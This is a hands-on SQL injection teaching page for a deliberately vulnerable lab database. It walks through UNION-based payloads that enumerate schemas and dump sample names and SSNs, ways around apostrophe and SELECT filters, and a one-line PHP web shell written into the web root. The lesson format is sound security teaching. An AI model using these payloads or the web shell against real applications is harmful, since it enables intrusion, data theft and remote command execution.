Introduction to SQL Injection: Hands-On

1. Reset the Database Before Using It

2. SQL Database Structure The database named sqlol contains the two tables shown below. Table: users Field: username Field: isadmin Herp Derper 1 SlapdeBack LovedeFace 1 Wengdack Slobdegoob 0 Chunk MacRunfast 0 Peter Weiner 0      Table: ssn Field: name Field: ssn Herp Derper 111-11-1111 SlapdeBack LovedeFace 222-22-2222 Wengdack Slobdegoob 333-33-3333 Chunk MacRunfast 444-44-4444 Peter Weiner 555-55-5555 Important Terms Database -- an object that contains Tables Table -- an object that contains Fields Field -- an item of data, such as a name or ssn

3. SQL SELECT Queries SQL uses easily-understood commands like SELECT, UPDATE, and DELETE. Try the queries below to see how SELECT works. Query:

SELECT Queries to Try
SELECT * FROM sqlol.users	Get all fields from the table "sql.users"
SELECT * FROM sqlol.ssn	Get all fields from the table "sql.ssn"
SELECT name FROM sqlol.ssn	Get field "name" from the table "sql.ssn"
SELECT ssn as name FROM sqlol.ssn	Get field "ssn" from the table "sql.ssn" and change its field name to "name"
SELECT * FROM sqlol.ssn WHERE name='Herp Derper'	Get all fields from the table "sql.ssn" with the "name" field equal to "Herp Derper"
SELECT * FROM sqlol.ssn WHERE name='Fred'	Get all fields from the table "sql.ssn" with the "name" field equal to "Fred"
SELECT * FROM sqlol.ssn WHERE name='Fred' OR 'a'='a'	Get all fields from the table "sql.ssn" (the condition is always true)
SELECT username FROM sqlol.users UNION SELECT ssn AS username FROM sqlol.ssn	Combine data from two tables
SELECT "Literal text" into outfile '/var/www/html/test1.htm'	Put literal text into a file (you'll need to change the filename to something that hasn't been used yet) ty @faisal_hfr

4. Search for Usernames Websites don't usually let you type in complete SQL queries, but only fields like usernames and passwords. Attackers can sneak SQL commands in by using special characters like apostrophes. Try the usernames below in this form to see how it works. Name:       Performs This Query: SELECT username FROM users WHERE username LIKE 'name'

Usernames to Try Find User Herp Derper Detect Vulnerability Mike O'Neil Find Database Names ' UNION SELECT table_schema AS username FROM information_schema.tables WHERE 'a'='a Find Tables in sqlol Database ' UNION SELECT table_name AS username FROM information_schema.tables WHERE table_schema='sqlol Find Columns within ssl Table ' UNION SELECT column_name AS username FROM information_schema.columns WHERE table_name='ssn' AND table_schema='sqlol Dump Names and SSNs ' UNION SELECT concat(name, ':', ssn) AS username FROM sqlol.ssn WHERE 'a'='a Upload a PHP Shell ' union select "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/wastc.php' #

5. Safer Search with Input Validation The simplest defense is to encode special characters. This stops many common SQL injection attacks with a single line of code. Try the usernames above in this form: Name:       Performs This Query: SELECT username FROM users WHERE username LIKE 'name' Uses mysql_real_escape_string to Encode Special Characters

6. Challenges Use the form in item 4 above to inject usernames that do the things below. For hints, see the "Sources" at the bottom of the page. Challenge 1: Display names for administrators only, as shown below: Challenge 2: Create a file on my server with your name as a filename, as shown below. Challenge 3: Display the /etc/passwd file in a browser, as shown below: Challenge 4: Put your name into these two files: /var/www/html/SQLchal/winners /var/www/html/SQLchal/updatenow Within a minute, your name will appear on the Winners page as shown below: Challenge 5: Use a different server, without the option to use raw SELECT queries. Before starting, click the button below to reset the database: Now use this name search form: Name:       Put your name into these two files on that server: /tmp/SQLchal/winners /tmp/SQLchal/updatenow Within a minute, your name will appear on the Winners page as shown below:

7. Blocking Apostrophes This form deletes apostrophes from the name before using it in a SQL query. However, the numerical field is exploitable. Try the inputs below in this form to see how it works. Name:   IsAdmin (0 or 1):       Performs This Query: SELECT username FROM users WHERE username LIKE 'name AND isadmin = IsAdmin'

Values to Try Find User Name Herp Derper Isadmin       1 Detect Filtering Name Herp 'Derper Isadmin       1 Detect Vulnerability Name Herp Derper Isadmin       2-1 Test for 1 Column Returned Name Herp Derper Isadmin       1 UNION SELECT Null # Test for 2 Columns Returned Name Herp Derper Isadmin       1 UNION SELECT Null, Null # Find Database Names Name Herp Derper Isadmin 1 UNION SELECT Null,table_schema FROM information_schema.tables # Find Tables in sqlol Database Name Herp Derper Isadmin 1 UNION SELECT Null, table_name FROM information_schema.tables WHERE table_schema='sqlol' # Find Columns within ssn Table Name Herp Derper Isadmin 1 UNION SELECT Null, column_name FROM information_schema.columns WHERE table_name='ssn' AND table_schema='sqlol' # Dump Names and SSNs Name Herp Derper Isadmin 1 UNION SELECT Null, concat(name, ':', ssn) FROM sqlol.ssn # Upload a PHP Shell Name Herp Derper Isadmin 1 UNION SELECT Null, "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/shell17.php' #

8. Blocking SELECT This form uses this code to remove SELECT: $qname = str_replace("SELECT", "", $qname); $qisadmin = str_replace("SELECT", "", $qisadmin); Try the inputs below in this form to see how it works. Name:   IsAdmin (0 or 1):       Performs This Query: SELECT username FROM users WHERE username LIKE 'name AND isadmin = IsAdmin'

Values to Try Find User Name Herp Derper Isadmin       1 Detect Filtering Name HerpSELECT Derper" Isadmin       1SELECT Detect Vulnerability Name Herp Derper Isadmin       2-1 Test for 2 Columns Returned: FAILS Name Herp Derper Isadmin       1 UNION SELECT Null, Null # Test for 2 Columns Returned: SUCCEEDS Name Herp Derper Isadmin       1 UNION SELSELECTECT Null, Null # Test for 2 Columns Returned: SUCCEEDS Name Herp Derper Isadmin       1 UNION sElEcT Null, Null #

More Projects SQL Injection with SQLol Exploiting SQLi with Havij and Input Filtering sqlmap Fixing MySQL with Parameterized Queries

Thanks to @Faisal_HFR for using SELECT "Literal text" into outfile, a much better way to get onto the winers page than I used. @bcrook88 for injecting JavaScript onto the winners page twice, so I added input filtering and more strict apparmor rules to MySQL to stop it. @bcrook88 for uploading a PHP shell that let him execute arbitrary bash commands, inspiring challenge 6. Sources Based on SQLol from SpiderLabs. SQL Injection Modify / Insert Table Values Hackproofing MySQL (from 2004) Hackproofing MySQL (alternative download link) MySQL SUBSTRING() function MySQL - Concatenation Creating Metasploit Payloads Exploiting PHP Vulnerabilities Useful SQL Injections Getting around "su : must be run from a terminal"